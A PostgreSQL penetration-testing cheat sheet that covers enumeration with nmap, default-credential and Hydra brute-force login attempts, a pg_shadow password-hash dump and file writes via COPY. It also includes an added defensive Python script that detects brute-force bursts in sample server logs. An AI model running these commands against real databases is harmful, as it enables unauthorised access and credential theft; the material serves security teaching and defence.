PostgreSQL

Default Port: 5432

PostgreSQL, also known as Postgres, is a powerful open-source object-relational database system. It has earned a strong reputation for its proven architecture, reliability, data integrity, robust feature set, and extensibility.

Connect

Connect with psql

psql -h <target-host> -p <port> -U <username> -W

Enumeration

Identify PostgreSQL

To identify the presence of PostgreSQL, nmap can be quite handy:

nmap -sV -p 5432 <target-host>

This scans for open PostgreSQL services running on their default port (5432) and attempts to determine the version.

Version Enumeration

Knowing the version of PostgreSQL can give insights into specific vulnerabilities:

nmap -sV --script=postgresql-info -p 5432 <target-host>

Attack Vectors

Default Credentials

Many PostgreSQL installations use default or weak credentials. Attempt to log in using common defaults like postgres for both username and password.

Brute Forcing Credentials with Hydra

Before gaining access, it might be necessary to brute force credentials. Tools like Hydra can help in this regard:

hydra -L userlist.txt -P passlist.txt <target-ip> postgres
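From the defender's side, a password-guessing run like the one above shows up in the PostgreSQL server log as a burst of "password authentication failed" lines from one client. The following detection logic is an added example, not part of the original page: it parses constructed log lines and assumes a log_line_prefix of '%m [%p] %u@%d %h ', so the client address follows the user@database field.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from a real server). Assumes a log_line_prefix of
# '%m [%p] %u@%d %h ' so the client address follows the user@database field.
SAMPLE_LOG = """\
2024-05-01 10:00:01.123 UTC [4101] postgres@postgres 203.0.113.7 FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01.456 UTC [4102] admin@postgres 203.0.113.7 FATAL:  password authentication failed for user "admin"
2024-05-01 10:00:02.001 UTC [4103] postgres@postgres 203.0.113.7 FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:02.340 UTC [4104] app@appdb 203.0.113.7 FATAL:  password authentication failed for user "app"
2024-05-01 10:00:02.900 UTC [4105] postgres@postgres 203.0.113.7 FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:03.210 UTC [4106] test@postgres 203.0.113.7 FATAL:  password authentication failed for user "test"
2024-05-01 10:05:00.000 UTC [4107] app@appdb 198.51.100.9 FATAL:  password authentication failed for user "app"
"""

# Matches only failed password authentications; every other message is ignored.
FAIL_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ \S+ \[\d+\] '
    r'\S+@\S+ (?P<host>\S+) FATAL:\s+password authentication failed for user "(?P<user>[^"]+)"'
)

def parse_failures(log_text):
    """Yield (timestamp, client_host, username) for every failed login in the log."""
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["host"], m["user"]

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {host: {"failures": n, "users": [...]}} for each client that produced
    at least `threshold` failures inside any sliding window of `window_seconds`."""
    by_host = defaultdict(list)
    for ts, host, user in parse_failures(log_text):
        by_host[host].append((ts, user))
    alerts, window = {}, timedelta(seconds=window_seconds)
    for host, events in by_host.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[host] = {"failures": len(events), "users": sorted({u for _, u in events})}
                break
    return alerts

if __name__ == "__main__":
    for host, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"possible brute force from {host}: {info['failures']} failures, users: {info['users']}")
```

A single failure from 198.51.100.9 stays below the threshold, while the six rapid failures across four usernames from 203.0.113.7 raise an alert.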

Exploiting Known Vulnerabilities

Check for publicly known vulnerabilities in the specific PostgreSQL version using tools like searchsploit:

searchsploit postgresql <version>

Post-Exploitation

Enumerating Databases and Tables

Upon gaining access, enumerating the databases and tables helps in understanding the structure and finding sensitive information.

List all databases:

\l

Switch to a database:

\c <database_name>

List tables in the current database:

\dt

Extract data from a specific table:

SELECT * FROM <table_name>;

Dumping Hashes

SELECT usename, passwd FROM pg_shadow;

Reading pg_shadow requires superuser privileges. The hashes it returns can then be attacked offline with tools like John the Ripper or hashcat.

Accessing File System

PostgreSQL can interact with the underlying file system. With enough privileges (server-side COPY to or from a file requires a superuser, or a role granted pg_read_server_files or pg_write_server_files), an attacker could read or write files, subject to the permissions of the database server's OS account:

COPY (SELECT * FROM sensitive_table) TO '/tmp/sensitive_data.txt';